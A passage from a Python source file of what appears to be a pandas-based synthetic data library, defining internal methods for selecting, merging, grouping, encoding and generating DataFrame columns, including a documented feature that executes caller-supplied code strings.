rename_map: dict=None, default_size: int=None, seed: int=None) -> pd.DataFrame:
""" Selects rows and/or columns changing the shape of the DatFrame. This is always run last in a pipeline
Rows are filtered before the column filter so columns can be referenced even though they might not be included
the final column list.
:param canonical: a pd.DataFrame as the reference dataframe
:param selection: a list of selections where conditions are filtered on, executed in list order
An example of a selection with the minimum requirements is: (see 'select2dict(...)')
[{'column': 'genre', 'condition': "=='Comedy'"}]
:param headers: a list of headers to drop or filter on type
:param drop: to drop or not drop the headers
:param dtype: the column types to include or exclusive. Default None else int, float, bool, object, 'number'
:param exclude: to exclude or include the dtypes
:param regex: a regular expression to search the headers. example '^((?!_amt).)*$)' excludes '_amt' columns
:param re_ignore_case: true if the regex should ignore case. Default is False
:param rename_map: a from: to dictionary of headers to rename
:param default_size: if the canonical fails return an empty dataframe with the default index size
:param seed: this is a place holder, here for compatibility across methods
:return: pd.DataFrame
The starter is a pd.DataFrame, a pd.Series or list, a connector contract str reference or a set of
parameter instructions on how to generate a pd.Dataframe. the description of each is:
- pd.Dataframe -> a deep copy of the pd.DataFrame
- pd.Series or list -> creates a pd.DataFrame of one column with the 'header' name or 'default' if not given
- str -> instantiates a connector handler with the connector_name and loads the DataFrame from the connection
- int -> generates an empty pd.Dataframe with an index size of the int passed.
- dict -> use canonical2dict(...) to help construct a dict with a 'method' to build a pd.DataFrame
methods:
- model_*(...) -> one of the SyntheticBuilder model methods and parameters
- @empty -> generates an empty pd.DataFrame where size and headers can be passed
:size sets the index size of the dataframe
:headers any initial headers for the dataframe
- @generate -> generate a synthetic file from a remote Domain Contract
:task_name the name of the SyntheticBuilder task to run
:repo_uri the location of the Domain Product
:size (optional) a size to generate
:seed (optional) if a seed should be applied
:run_book (optional) if specific intent should be run only
Selections are a list of dictionaries of conditions and optional additional parameters to filter.
To help build conditions there is a static helper method called 'select2dict(...)' that has parameter
options available to build a condition.
An example of a condition with the minimum requirements is
[{'column': 'genre', 'condition': "=='Comedy'"}]
an example of using the helper method
selection = [inst.select2dict(column='gender', condition="=='M'"),
inst.select2dict(column='age', condition=">65", logic='XOR')]
Using the 'select2dict' method ensure the correct keys are used and the dictionary is properly formed. It also
helps with building the logic that is executed in order
"""
canonical = self._get_canonical(canonical, size=default_size)
# not used but in place form method consistency
_seed = self._seed() if seed is None else seed
if isinstance(selection, list):
selection = deepcopy(selection)
# run the select logic
select_idx = self._selection_index(canonical=canonical, selection=selection)
canonical = canonical.iloc[select_idx].reset_index(drop=True)
drop = drop if isinstance(drop, bool) else False
exclude = exclude if isinstance(exclude, bool) else False
re_ignore_case = re_ignore_case if isinstance(re_ignore_case, bool) else False
rtn_frame = Commons.filter_columns(canonical, headers=headers, drop=drop, dtype=dtype, exclude=exclude,
regex=regex, re_ignore_case=re_ignore_case)
if isinstance(rename_map, dict):
rtn_frame.rename(mapper=rename_map, axis='columns', inplace=True)
return rtn_frame
def _frame_selection(self, canonical: Any, selection: list=None, headers: [str, list]=None,
drop: bool=None, dtype: [str, list]=None, exclude: bool=None, regex: [str, list]=None,
re_ignore_case: bool=None, seed: int=None) -> pd.DataFrame:
""" This method always runs at the start of the pipeline, taking a direct or generated pd.DataFrame,
see context notes below, as the foundation canonical of all subsequent steps of the pipeline.
:param canonical: a direct or generated pd.DataFrame. see context notes below
:param selection: a list of selections where conditions are filtered on, executed in list order
An example of a selection with the minimum requirements is: (see 'select2dict(...)')
[{'column': 'genre', 'condition': "=='Comedy'"}]
:param headers: a list of headers to drop or filter on type
:param drop: to drop or not drop the headers
:param dtype: the column types to include or exclusive. Default None else int, float, bool, object, 'number'
:param exclude: to exclude or include the dtypes
:param regex: a regular expression to search the headers. example '^((?!_amt).)*$)' excludes '_amt' columns
:param re_ignore_case: true if the regex should ignore case. Default is False
:param seed: this is a place holder, here for compatibility across methods
:return: pd.DataFrame
Selections are a list of dictionaries of conditions and optional additional parameters to filter.
To help build conditions there is a static helper method called 'select2dict(...)' that has parameter
options available to build a condition.
An example of a condition with the minimum requirements is
[{'column': 'genre', 'condition': "=='Comedy'"}]
an example of using the helper method
selection = [inst.select2dict(column='gender', condition="=='M'"),
inst.select2dict(column='age', condition=">65", logic='XOR')]
Using the 'select2dict' method ensure the correct keys are used and the dictionary is properly formed. It also
helps with building the logic that is executed in order
"""
return self._frame_starter(canonical=canonical, selection=selection, headers=headers, drop=drop, dtype=dtype,
exclude=exclude, regex=regex, re_ignore_case=re_ignore_case, seed=seed)
def _model_custom(self, canonical: Any, code_str: str, seed: int=None, **kwargs):
""" Commonly used for custom methods, takes code string that when executed changes the the canonical returning
the modified canonical. If the method passes returns a pd.Dataframe this will be returned else the assumption is
the canonical has been changed inplace and thus the modified canonical will be returned
When referencing the canonical in the code_str it should be referenced either by use parameter label 'canonical'
or the short cut '@' symbol. kwargs can also be passed into the code string but must be preceded by a '$' symbol
for example:
assume canonical['gender'] = ['M', 'F', 'U']
code_str ='''
\n@['new_gender'] = [True if x in $value else False for x in @[$header]]
\n@['value'] = [4, 5, 6]
'''
where kwargs are header="'gender'" and value=['M', 'F']
:param canonical: a pd.DataFrame as the reference dataframe
:param code_str: an action on those column values. to reference the canonical use '@'
:param seed: (optional) a seed value for the random function: default to None
:param kwargs: a set of kwargs to include in any executable function
:return: a list (optionally a pd.DataFrame
"""
canonical = self._get_canonical(canonical)
_seed = seed if isinstance(seed, int) else self._seed()
local_kwargs = locals()
for k, v in local_kwargs.pop('kwargs', {}).items():
local_kwargs.update({k: v})
code_str = code_str.replace(f'${k}', str(v))
code_str = code_str.replace('@', 'canonical')
df = exec(code_str, globals(), local_kwargs)
if df is None:
return canonical
return df
def _model_iterator(self, canonical: Any, marker_col: str=None, starting_frame: str=None, selection: list=None,
default_action: dict=None, iteration_actions: dict=None, iter_start: int=None,
iter_stop: int=None, seed: int=None) -> pd.DataFrame:
""" This method allows one to model repeating data subset that has some form of action applied per iteration.
The optional marker column must be included in order to apply actions or apply an iteration marker
An example of use might be a recommender generator where a cohort of unique users need to be selected, for
different recommendation strategies but users can be repeated across recommendation strategy
:param canonical: a pd.DataFrame as the reference dataframe
:param marker_col: (optional) the marker column name for the action outcome. default is to not include
:param starting_frame: (optional) a str referencing an existing connector contract name as the base DataFrame
:param selection: (optional) a list of selections where conditions are filtered on, executed in list order
An example of a selection with the minimum requirements is: (see 'select2dict(...)')
[{'column': 'genre', 'condition': "=='Comedy'"}]
:param default_action: (optional) a default action to take on all iterations. defaults to iteration value
:param iteration_actions: (optional) a dictionary of actions where the key is a specific iteration
:param iter_start: (optional) the start value of the range iteration default is 0
:param iter_stop: (optional) the stop value of the range iteration default is start iteration + 1
:param seed: (optional) this is a place holder, here for compatibility across methods
:return: pd.DataFrame
The starting_frame can be a pd.DataFrame, a pd.Series, int or list, a connector contract str reference or a
set of parameter instructions on how to generate a pd.Dataframe. the description of each is:
- pd.Dataframe -> a deep copy of the pd.DataFrame
- pd.Series or list -> creates a pd.DataFrame of one column with the 'header' name or 'default' if not given
- str -> instantiates a connector handler with the connector_name and loads the DataFrame from the connection
- int -> generates an empty pd.Dataframe with an index size of the int passed.
- dict -> use canonical2dict(...) to help construct a dict with a 'method' to build a pd.DataFrame
methods:
- model_*(...) -> one of the SyntheticBuilder model methods and parameters
- @empty -> generates an empty pd.DataFrame where size and headers can be passed
:size sets the index size of the dataframe
:headers any initial headers for the dataframe
- @generate -> generate a synthetic file from a remote Domain Contract
:task_name the name of the SyntheticBuilder task to run
:repo_uri the location of the Domain Product
:size (optional) a size to generate
:seed (optional) if a seed should be applied
:run_book (optional) if specific intent should be run only
Selections are a list of dictionaries of conditions and optional additional parameters to filter.
To help build conditions there is a static helper method called 'select2dict(...)' that has parameter
options available to build a condition.
An example of a condition with the minimum requirements is
[{'column': 'genre', 'condition': "=='Comedy'"}]
an example of using the helper method
selection = [inst.select2dict(column='gender', condition="=='M'"),
inst.select2dict(column='age', condition=">65", logic='XOR')]
Using the 'select2dict' method ensure the correct keys are used and the dictionary is properly formed. It also
helps with building the logic that is executed in order
Actions are the resulting outcome of the selection (or the default). An action can be just a value or a dict
that executes a intent method such as get_number(). To help build actions there is a helper function called
action2dict(...) that takes a method as a mandatory attribute.
With actions there are special keyword 'method' values:
@header: use a column as the value reference, expects the 'header' key
@constant: use a value constant, expects the key 'value'
@sample: use to get sample values, expected 'name' of the Sample method, optional 'shuffle' boolean
@eval: evaluate a code string, expects the key 'code_str' and any locals() required
An example of a simple action to return a selection from a list:
{'method': 'get_category', selection: ['M', 'F', 'U']}
This same action using the helper method would look like:
inst.action2dict(method='get_category', selection=['M', 'F', 'U'])
an example of using the helper method, in this example we use the keyword @header to get a value from another
column at the same index position:
inst.action2dict(method="@header", header='value')
We can even execute some sort of evaluation at run time:
inst.action2dict(method="@eval", code_str='sum(values)', values=[1,4,2,1])
"""
canonical = self._get_canonical(canonical)
rtn_frame = self._get_canonical(starting_frame)
_seed = self._seed() if seed is None else seed
iter_start = iter_start if isinstance(iter_start, int) else 0
iter_stop = iter_stop if isinstance(iter_stop, int) and iter_stop > iter_start else iter_start + 1
default_action = default_action if isinstance(default_action, dict) else 0
iteration_actions = iteration_actions if isinstance(iteration_actions, dict) else {}
for counter in range(iter_start, iter_stop):
df_count = canonical.copy()
# selection
df_count = self._frame_selection(df_count, selection=selection, seed=_seed)
# actions
if isinstance(marker_col, str):
if counter in iteration_actions.keys():
_action = iteration_actions.get(counter, None)
df_count[marker_col] = self._apply_action(df_count, action=_action, seed=_seed)
else:
default_action = default_action if isinstance(default_action, dict) else counter
df_count[marker_col] = self._apply_action(df_count, action=default_action, seed=_seed)
rtn_frame = pd.concat([rtn_frame, df_count], ignore_index=True)
return rtn_frame
def _model_group(self, canonical: Any, headers: [str, list], group_by: [str, list], aggregator: str=None,
list_choice: int=None, list_max: int=None, drop_group_by: bool=False, seed: int=None,
include_weighting: bool=False, freq_precision: int=None, remove_weighting_zeros: bool=False,
remove_aggregated: bool=False) -> pd.DataFrame:
""" returns the full column values directly from another connector data source. in addition the the
standard groupby aggregators there is also 'list' and 'set' that returns an aggregated list or set.
These can be using in conjunction with 'list_choice' and 'list_size' allows control of the return values.
if list_max is set to 1 then a single value is returned rather than a list of size 1.
:param canonical: a pd.DataFrame as the reference dataframe
:param headers: the column headers to apply the aggregation too
:param group_by: the column headers to group by
:param aggregator: (optional) the aggregator as a function of Pandas DataFrame 'groupby' or 'list' or 'set'
:param list_choice: (optional) used in conjunction with list or set aggregator to return a random n choice
:param list_max: (optional) used in conjunction with list or set aggregator restricts the list to a n size
:param drop_group_by: (optional) drops the group by headers
:param include_weighting: (optional) include a percentage weighting column for each
:param freq_precision: (optional) a precision for the relative_freq values
:param remove_aggregated: (optional) if used in conjunction with the weighting then drops the aggregator column
:param remove_weighting_zeros: (optional) removes zero values
:param seed: (optional) this is a place holder, here for compatibility across methods
:return: a pd.DataFrame
"""
canonical = self._get_canonical(canonical)
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
freq_precision = freq_precision if isinstance(freq_precision, int) else 3
aggregator = aggregator if isinstance(aggregator, str) else 'sum'
headers = Commons.list_formatter(headers)
group_by = Commons.list_formatter(group_by)
df_sub = Commons.filter_columns(canonical, headers=headers + group_by).dropna()
if aggregator.startswith('set') or aggregator.startswith('list'):
df_tmp = df_sub.groupby(group_by)[headers[0]].apply(eval(aggregator)).apply(lambda x: list(x))
df_tmp = df_tmp.reset_index()
for idx in range(1, len(headers)):
result = df_sub.groupby(group_by)[headers[idx]].apply(eval(aggregator)).apply(lambda x: list(x))
df_tmp = df_tmp.merge(result, how='left', left_on=group_by, right_index=True)
for idx in range(len(headers)):
header = headers[idx]
if isinstance(list_choice, int):
df_tmp[header] = df_tmp[header].apply(lambda x: generator.choice(x, size=list_choice))
if isinstance(list_max, int):
df_tmp[header] = df_tmp[header].apply(lambda x: x[0] if list_max == 1 else x[:list_max])
df_sub = df_tmp
else:
df_sub = df_sub.groupby(group_by, as_index=False).agg(aggregator)
if include_weighting:
df_sub['sum'] = df_sub.sum(axis=1, numeric_only=True)
total = df_sub['sum'].sum()
df_sub['weighting'] = df_sub['sum'].\
apply(lambda x: round((x / total), freq_precision) if isinstance(x, (int, float)) else 0)
df_sub = df_sub.drop(columns='sum')
if remove_weighting_zeros:
df_sub = df_sub[df_sub['weighting'] > 0]
df_sub = df_sub.sort_values(by='weighting', ascending=False)
if remove_aggregated:
df_sub = df_sub.drop(headers, axis=1)
if drop_group_by:
df_sub = df_sub.drop(columns=group_by, errors='ignore')
return df_sub
def _model_merge(self, canonical: Any, other: Any, left_on: str=None, right_on: str=None,
on: str=None, how: str=None, headers: list=None, suffixes: tuple=None, indicator: bool=None,
validate: str=None, seed: int=None) -> pd.DataFrame:
""" returns the full column values directly from another connector data source. The indicator parameter can be
used to mark the merged items.
:param canonical: a pd.DataFrame as the reference dataframe
:param other: a direct or generated pd.DataFrame. see context notes below
:param left_on: the canonical key column(s) to join on
:param right_on: the merging dataset key column(s) to join on
:param on: if th left and right join have the same header name this can replace left_on and right_on
:param how: (optional) One of 'left', 'right', 'outer', 'inner'. Defaults to inner. See below for more detailed
description of each method.
:param headers: (optional) a filter on the headers included from the right side
:param suffixes: (optional) A tuple of string suffixes to apply to overlapping columns. Defaults ('', '_dup').
:param indicator: (optional) Add a column to the output DataFrame called _merge with information on the source
of each row. _merge is Categorical-type and takes on a value of left_only for observations whose
merge key only appears in 'left' DataFrame or Series, right_only for observations whose merge key
only appears in 'right' DataFrame or Series, and both if the observation’s merge key is found
in both.
:param validate: (optional) validate : string, default None. If specified, checks if merge is of specified type.
“one_to_one” or “1:1”: checks if merge keys are unique in both left and right datasets.
“one_to_many” or “1:m”: checks if merge keys are unique in left dataset.
“many_to_one” or “m:1”: checks if merge keys are unique in right dataset.
“many_to_many” or “m:m”: allowed, but does not result in checks.
:param seed: this is a place holder, here for compatibility across methods
:return: a pd.DataFrame
The other is a pd.DataFrame, a pd.Series, int or list, a connector contract str reference or a set of
parameter instructions on how to generate a pd.Dataframe. the description of each is:
- pd.Dataframe -> a deep copy of the pd.DataFrame
- pd.Series or list -> creates a pd.DataFrame of one column with the 'header' name or 'default' if not given
- str -> instantiates a connector handler with the connector_name and loads the DataFrame from the connection
- int -> generates an empty pd.Dataframe with an index size of the int passed.
- dict -> use canonical2dict(...) to help construct a dict with a 'method' to build a pd.DataFrame
methods:
- model_*(...) -> one of the SyntheticBuilder model methods and parameters
- @empty -> generates an empty pd.DataFrame where size and headers can be passed
:size sets the index size of the dataframe
:headers any initial headers for the dataframe
- @generate -> generate a synthetic file from a remote Domain Contract
:task_name the name of the SyntheticBuilder task to run
:repo_uri the location of the Domain Product
:size (optional) a size to generate
:seed (optional) if a seed should be applied
:run_book (optional) if specific intent should be run only
"""
# Code block for intent
canonical = self._get_canonical(canonical)
other = self._get_canonical(other, size=canonical.shape[0])
_seed = self._seed() if seed is None else seed
how = how if isinstance(how, str) and how in ['left', 'right', 'outer', 'inner'] else 'inner'
indicator = indicator if isinstance(indicator, bool) else False
suffixes = suffixes if isinstance(suffixes, tuple) and len(suffixes) == 2 else ('', '_dup')
# Filter on the columns
if isinstance(headers, list):
headers.append(right_on if isinstance(right_on, str) else on)
other = Commons.filter_columns(other, headers=headers)
df_rtn = pd.merge(left=canonical, right=other, how=how, left_on=left_on, right_on=right_on, on=on,
suffixes=suffixes, indicator=indicator, validate=validate)
return df_rtn
def _model_concat(self, canonical: Any, other: Any, as_rows: bool=None, headers: [str, list]=None,
drop: bool=None, dtype: [str, list]=None, exclude: bool=None, regex: [str, list]=None,
re_ignore_case: bool=None, shuffle: bool=None, seed: int=None) -> pd.DataFrame:
""" returns the full column values directly from another connector data source.
:param canonical: a pd.DataFrame as the reference dataframe
:param other: a direct or generated pd.DataFrame. see context notes below
:param as_rows: (optional) how to concatenate, True adds the connector dataset as rows, False as columns
:param headers: (optional) a filter of headers from the 'other' dataset
:param drop: (optional) to drop or not drop the headers if specified
:param dtype: (optional) a filter on data type for the 'other' dataset. int, float, bool, object
:param exclude: (optional) to exclude or include the data types if specified
:param regex: (optional) a regular expression to search the headers. example '^((?!_amt).)*$)' excludes '_amt'
:param re_ignore_case: (optional) true if the regex should ignore case. Default is False
:param shuffle: (optional) if the rows in the loaded canonical should be shuffled
:param seed: this is a place holder, here for compatibility across methods
:return: a pd.DataFrame
The other is a pd.DataFrame, a pd.Series, int or list, a connector contract str reference or a set of
parameter instructions on how to generate a pd.Dataframe. the description of each is:
- pd.Dataframe -> a deep copy of the pd.DataFrame
- pd.Series or list -> creates a pd.DataFrame of one column with the 'header' name or 'default' if not given
- str -> instantiates a connector handler with the connector_name and loads the DataFrame from the connection
- int -> generates an empty pd.Dataframe with an index size of the int passed.
- dict -> use canonical2dict(...) to help construct a dict with a 'method' to build a pd.DataFrame
methods:
- model_*(...) -> one of the SyntheticBuilder model methods and parameters
- @empty -> generates an empty pd.DataFrame where size and headers can be passed
:size sets the index size of the dataframe
:headers any initial headers for the dataframe
- @generate -> generate a synthetic file from a remote Domain Contract
:task_name the name of the SyntheticBuilder task to run
:repo_uri the location of the Domain Product
:size (optional) a size to generate
:seed (optional) if a seed should be applied
:run_book (optional) if specific intent should be run only
"""
canonical = self._get_canonical(canonical)
other = self._get_canonical(other, size=canonical.shape[0])
_seed = self._seed() if seed is None else seed
shuffle = shuffle if isinstance(shuffle, bool) else False
as_rows = as_rows if isinstance(as_rows, bool) else False
# Filter on the columns
df_rtn = Commons.filter_columns(df=other, headers=headers, drop=drop, dtype=dtype, exclude=exclude,
regex=regex, re_ignore_case=re_ignore_case, copy=False)
if shuffle:
df_rtn.sample(frac=1, random_state=_seed).reset_index(drop=True)
if canonical.shape[0] <= df_rtn.shape[0]:
df_rtn = df_rtn.iloc[:canonical.shape[0]]
axis = 'index' if as_rows else 'columns'
return pd.concat([canonical, df_rtn], axis=axis)
def _model_dict_column(self, canonical: Any, header: str, convert_str: bool=None, replace_null: Any=None,
seed: int=None) -> pd.DataFrame:
""" takes a column that contains dict and expands them into columns. Note, the column must be a flat dictionary.
Complex structures will not work.
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header of the column to be convert
:param convert_str: (optional) if the header has the dict as a string convert to dict using ast.literal_eval()
:param replace_null: (optional) after conversion, replace null values with this value
:param seed: (optional) this is a place holder, here for compatibility across methods
:return: pd.DataFrame
"""
canonical = self._get_canonical(canonical)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
_seed = self._seed() if seed is None else seed
convert_str = convert_str if isinstance(convert_str, bool) else False
# replace NaN with '{}' if the column is strings, otherwise replace with {}
if convert_str:
canonical[header] = canonical[header].fillna('{}').apply(ast.literal_eval)
else:
canonical[header] = canonical[header].fillna({i: {} for i in canonical.index})
# convert the key/values into columns (this is the fasted code)
result = pd.json_normalize(canonical[header])
if isinstance(replace_null, (int, float, str)):
result.replace(np.nan, replace_null, inplace=True)
return canonical.join(result).drop(columns=[header])
def _model_explode(self, canonical: Any, header: str, seed: int=None) -> pd.DataFrame:
""" takes a single column of list values and explodes the DataFrame so row is represented by each elements
in the row list
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header of the column to be exploded
:param seed: (optional) this is a place holder, here for compatibility across methods
:return: a pd.DataFrame
The canonical is a pd.DataFrame, a pd.Series or list, a connector contract str reference or a set of
parameter instructions on how to generate a pd.Dataframe. the description of each is:
"""
canonical = self._get_canonical(canonical)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
_seed = self._seed() if seed is None else seed
return canonical.explode(column=header, ignore_index=True)
def _model_sample(self, canonical: Any, sample: Any, columns_list: list=None, exclude_associate: list=None,
auto_transition: bool=None, detail_numeric: bool=None, strict_typing: bool=None,
category_limit: int=None, apply_bias: bool=None, seed: int = None) -> pd.DataFrame:
""" Takes a sample dataset and using analytics, builds a set of synthetic columns that are representative of
the sample but scaled to the size of the canonical
:param canonical:
:param sample:
:param columns_list:
:param exclude_associate:
:param auto_transition:
:param detail_numeric:
:param strict_typing:
:param category_limit:
:param apply_bias:
:param seed: (optional) this is a place holder, here for compatibility across methods
:return: a pd.DataFrame
"""
canonical = self._get_canonical(canonical)
sample = self._get_canonical(sample)
auto_transition = auto_transition if isinstance(auto_transition, bool) else True
columns_list = columns_list if isinstance(columns_list, list) else list(sample.columns)
sample = Commons.filter_columns(sample, headers=columns_list)
if auto_transition:
Transition.from_memory().cleaners.auto_transition(sample, inplace=True)
blob = DataDiscovery.analyse_association(sample, columns_list=columns_list, exclude_associate=exclude_associate,
detail_numeric=detail_numeric, strict_typing=strict_typing,
category_limit=category_limit)
return self._model_analysis(canonical=canonical, analytics_blob=blob, apply_bias=apply_bias, seed=seed)
def _model_script(self, canonical: Any, script_contract: str, seed: int = None) -> pd.DataFrame:
"""Takes a synthetic build script and using analytics, builds a set of synthetic columns that are that are
defined by the build script and scaled to the size of the canonical
:param canonical:
:param script_contract:
:param seed: (optional) this is a place holder, here for compatibility across methods
:return: a pd.DataFrame
"""
canonical = self._get_canonical(canonical)
script = self._get_canonical(script_contract)
type_options = {'number': '_get_number', 'date': '_get_datetime', 'category': 'get_category',
'selection': 'get_selection', 'intervals': 'get_intervals', 'distribution': 'get_distribution'}
script['params'] = script['params'].replace(['', ' '], np.nan)
script['params'].loc[script['params'].isna()] = '[]'
script['params'] = [ast.literal_eval(x) if isinstance(x, str) and x.startswith('[') and x.endswith(']')
else x for x in script['params']]
# replace all other items with list
script['params'] = [x if isinstance(x, list) else [x] for x in script['params']]
script['params'] = script['params'].astype('object')
for index, row in script.iterrows():
method = type_options.get(row['type'])
params = row['params']
canonical[row['name']] = eval(f"self.{method}(size={canonical.shape[0]}, **params)", globals(), locals())
return canonical
def _model_analysis(self, canonical: Any, analytics_blob: dict, apply_bias: bool=None,
seed: int=None) -> pd.DataFrame:
""" builds a set of columns based on an analysis dictionary of weighting (see analyse_association)
if a reference DataFrame is passed then as the analysis is run if the column already exists the row
value will be taken as the reference to the sub category and not the random value. This allows already
constructed association to be used as reference for a sub category.
:param canonical: a pd.DataFrame as the reference dataframe
:param analytics_blob: the analytics blob from DataDiscovery.analyse_association(...)
:param apply_bias: (optional) if dominant values have been excluded, re-include to maintain bias
:param seed: seed: (optional) a seed value for the random function: default to None
:return: a DataFrame
"""
def get_level(analysis: dict, sample_size: int, _seed: int=None):
_seed = self._seed(seed=_seed, increment=True)
for name, values in analysis.items():
if row_dict.get(name) is None:
row_dict[name] = list()
_analysis = DataAnalytics(analysis=values.get('insight', {}))
result_type = object
if str(_analysis.intent.dtype).startswith('cat'):
result_type = 'category'
result = self._get_category(selection=_analysis.intent.categories,
relative_freq=_analysis.patterns.get('relative_freq', None),
seed=_seed, size=sample_size)
elif str(_analysis.intent.dtype).startswith('num'):
result_type = 'int' if _analysis.params.precision == 0 else 'float'
result = self._get_intervals(intervals=[tuple(x) for x in _analysis.intent.intervals],
relative_freq=_analysis.patterns.get('relative_freq', None),
precision=_analysis.params.get('precision', None),
seed=_seed, size=sample_size)
elif str(_analysis.intent.dtype).startswith('date'):
result_type = 'object' if _analysis.params.is_element('data_format') else 'date'
result = self._get_datetime(start=_analysis.stats.lowest,
until=_analysis.stats.highest,
relative_freq=_analysis.patterns.get('relative_freq', None),
date_format=_analysis.params.get('data_format', None),
day_first=_analysis.params.get('day_first', None),
year_first=_analysis.params.get('year_first', None),
seed=_seed, size=sample_size)
else:
result = []
# if the analysis was done with excluding dominance then se if they should be added back
if apply_bias and _analysis.patterns.is_element('dominant_excluded'):
_dom_percent = _analysis.patterns.dominant_percent/100
_dom_values = _analysis.patterns.dominant_excluded
if len(_dom_values) > 0:
s_values = pd.Series(result, dtype=result_type)
non_zero = s_values[~s_values.isin(_dom_values)].index
choice_size = int((s_values.size * _dom_percent) - (s_values.size - len(non_zero)))
if choice_size > 0:
generator = np.random.default_rng(_seed)
_dom_choice = generator.choice(_dom_values, size=choice_size)
s_values.iloc[generator.choice(non_zero, size=choice_size, replace=False)] = _dom_choice
result = s_values.to_list()
# now add the result to the row_dict
row_dict[name] += result
if sum(_analysis.patterns.relative_freq) == 0:
unit = 0
else:
unit = sample_size / sum(_analysis.patterns.relative_freq)
if values.get('sub_category'):
leaves = values.get('branch', {}).get('leaves', {})
for idx in range(len(leaves)):
section_size = int(round(_analysis.patterns.relative_freq[idx] * unit, 0)) + 1
next_item = values.get('sub_category').get(leaves[idx])
get_level(next_item, section_size, _seed)
return
canonical = self._get_canonical(canonical)
apply_bias = apply_bias if isinstance(apply_bias, bool) else True
row_dict = dict()
seed = self._seed() if seed is None else seed
size = canonical.shape[0]
get_level(analytics_blob, sample_size=size, _seed=seed)
for key in row_dict.keys():
row_dict[key] = row_dict[key][:size]
return pd.concat([canonical, pd.DataFrame.from_dict(data=row_dict)], axis=1)
def _model_encoding(self, canonical: Any, headers: [str, list], encoding: bool=None, ordinal: dict=None,
prefix=None, dtype: Any=None, prefix_sep: str=None, dummy_na: bool=False,
drop_first: bool=False, seed: int=None) -> pd.DataFrame:
""" encodes categorical data types, by default, as dummy encoded but optionally can choose label
encoding
:param canonical: a pd.DataFrame as the reference dataframe
:param headers: the header(s) to apply multi-hot
:param encoding: the type of encoding to apply to the categories, types supported 'dummy', 'ordinal', 'label'
:param ordinal: a dictionary of ordinal encoding. encoding must be 'ordinal', if not mapped then returns null
:param prefix : str, list of str, or dict of str, default None
String to append DataFrame column names.
Pass a list with length equal to the number of columns
when calling get_dummies on a DataFrame. Alternatively, `prefix`
can be a dictionary mapping column names to prefixes.
:param prefix_sep : str, default '_'
If appending prefix, separator/delimiter to use. Or pass a
list or dictionary as with `prefix`.
:param dummy_na : bool, default False
Add a column to indicate NaNs, if False NaNs are ignored.
:param drop_first : bool, default False
Whether to get k-1 dummies out of k categorical levels by removing the
first level.
:param dtype : dtype, default np.uint8
Data type for new columns. Only a single dtype is allowed.
:param seed: seed: (optional) a seed value for the random function: default to None
:return: a pd.Dataframe
"""
# intend code block on the canonical
canonical = self._get_canonical(canonical)
headers = Commons.list_formatter(headers)
seed = self._seed() if seed is None else seed
encoding = encoding if isinstance(encoding, str) and encoding in ['label', 'ordinal'] else 'dummy'
prefix = prefix if isinstance(prefix, str) else None
prefix_sep = prefix_sep if isinstance(prefix_sep, str) else "_"
dummy_na = dummy_na if isinstance(dummy_na, bool) else False
drop_first = drop_first if isinstance(drop_first, bool) else False
dtype = dtype if dtype else np.uint8
for header in headers:
if canonical[header].dtype.name != 'category':
canonical[header] = canonical[header].astype('category')
if encoding == 'ordinal':
ordinal = ordinal if isinstance(ordinal, dict) else {}
canonical[header] = canonical[header].map(ordinal, na_action=np.nan)
elif encoding == 'label':
canonical[f"{prefix}{prefix_sep}{header}"] = canonical[header].cat.codes
if encoding == 'dummy':
dummy_df = pd.get_dummies(canonical, columns=headers, prefix=prefix, prefix_sep=prefix_sep,
dummy_na=dummy_na, drop_first=drop_first, dtype=dtype)
for name in dummy_df.columns:
canonical[name] = dummy_df[name]
return canonical
def _correlate_selection(self, canonical: Any, selection: list, action: [str, int, float, dict],
default_action: [str, int, float, dict]=None, seed: int=None, rtn_type: str=None):
""" returns a value set based on the selection list and the action enacted on that selection. If
the selection criteria is not fulfilled then the default_action is taken if specified, else null value.
If a DataFrame is not passed, the values column is referenced by the header '_default'
:param canonical: a pd.DataFrame as the reference dataframe
:param selection: a list of selections where conditions are filtered on, executed in list order
An example of a selection with the minimum requirements is: (see 'select2dict(...)')
[{'column': 'genre', 'condition': "=='Comedy'"}]
:param action: a value or dict to act upon if the select is successful. see below for more examples
An example of an action as a dict: (see 'action2dict(...)')
{'method': 'get_category', 'selection': ['M', 'F', 'U']}
:param default_action: (optional) a default action to take if the selection is not fulfilled
:param seed: (optional) a seed value for the random function: default to None
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: value set based on the selection list and the action
Selections are a list of dictionaries of conditions and optional additional parameters to filter.
To help build conditions there is a static helper method called 'select2dict(...)' that has parameter
options available to build a condition.
An example of a condition with the minimum requirements is
[{'column': 'genre', 'condition': "=='Comedy'"}]
an example of using the helper method
selection = [inst.select2dict(column='gender', condition="=='M'"),
inst.select2dict(column='age', condition=">65", logic='XOR')]
Using the 'select2dict' method ensure the correct keys are used and the dictionary is properly formed. It also
helps with building the logic that is executed in order
Actions are the resulting outcome of the selection (or the default). An action can be just a value or a dict
that executes a intent method such as get_number(). To help build actions there is a helper function called
action2dict(...) that takes a method as a mandatory attribute.
With actions there are special keyword 'method' values:
@header: use a column as the value reference, expects the 'header' key
@constant: use a value constant, expects the key 'value'
@sample: use to get sample values, expected 'name' of the Sample method, optional 'shuffle' boolean
@eval: evaluate a code string, expects the key 'code_str' and any locals() required
An example of a simple action to return a selection from a list:
{'method': 'get_category', selection: ['M', 'F', 'U']}
This same action using the helper method would look like:
inst.action2dict(method='get_category', selection=['M', 'F', 'U'])
an example of using the helper method, in this example we use the keyword @header to get a value from another
column at the same index position:
inst.action2dict(method="@header", header='value')
We can even execute some sort of evaluation at run time:
inst.action2dict(method="@eval", code_str='sum(values)', values=[1,4,2,1])
"""
canonical = self._get_canonical(canonical)
if len(canonical) == 0:
raise TypeError("The canonical given is empty")
if not isinstance(selection, list):
raise ValueError("The 'selection' parameter must be a 'list' of 'dict' types")
if not isinstance(action, (str, int, float, dict)) or (isinstance(action, dict) and len(action) == 0):
raise TypeError("The 'action' parameter is not of an accepted format or is empty")
_seed = seed if isinstance(seed, int) else self._seed()
# prep the values to be a DataFrame if it isn't already
action = deepcopy(action)
selection = deepcopy(selection)
# run the logic
select_idx = self._selection_index(canonical=canonical, selection=selection)
